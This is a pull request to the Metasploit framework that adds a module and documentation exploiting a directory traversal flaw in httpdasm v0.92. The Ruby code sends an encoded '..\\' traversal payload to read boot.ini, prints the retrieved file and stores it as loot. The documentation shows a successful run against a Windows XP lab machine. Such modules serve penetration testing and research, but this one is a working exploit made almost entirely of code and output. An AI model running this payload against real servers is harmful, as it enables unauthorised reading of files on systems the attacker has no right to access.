### PR TITLE
Add auxiliary module to exploit directory traversal vulnerability

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md
@@ -1,0 +1,34 @@
+## Description
+
+  This module exploits a directory traversal vulnerability to read files from a server running httpdasm v0.92.
+
+## Vulnerable Application
+
+  httpdasm 0.92
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use [auxiliary/scanner/http/httpdasm_directory_traversal]`
+  3. `set RHOSTS [IP]`
+  4. `run`
+
+## Scenarios
+
+### Tested on Windows XP x86
+
+  ```
+  msf5 > use auxiliary/scanner/http/httpdasm_directory_traversal
+  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128
+  rhosts => 192.168.37.128
+  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > run
+
+  [boot loader]
+  timeout=30
+  default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
+  [operating systems]
+  multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+  [*] Auxiliary module execution completed
+  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) >
+  ```

--- a/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
@@ -1,0 +1,49 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Httpdasm Directory Traversal',
+      'Description'    => %q{
+        Exploits a directory traversal vulnerability to read files from server running httpdasm v0.92.
+      },
+      'Author'         =>
+        [
+          'John Leitch', # EDB POC
+          'Shelby Pace' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '15861']
+        ]
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [true, 'Default path', '%2e%2e%5c' * 8 + 'boot.ini'])
+    ])
+
+  end
+
+  def run
+    uri = target_uri.path
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri)
+    })
+
+    if res && res.code == 200
+      print_status(res.body)
+      path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)
+    else
+      print_error("Timeout")
+    end
+    end
+end


### PR DESCRIPTION
Add an auxiliary module that exploits a directory traversal vulnerability to read files from a server running [httpdasm v0.92](https://www.exploit-db.com/exploits/15861/).

## Verification

  1. Start `msfconsole`
  2. `use auxiliary/scanner/http/httpdasm_directory_traversal`
  3. `set RHOSTS [IP]`
  4. `run`

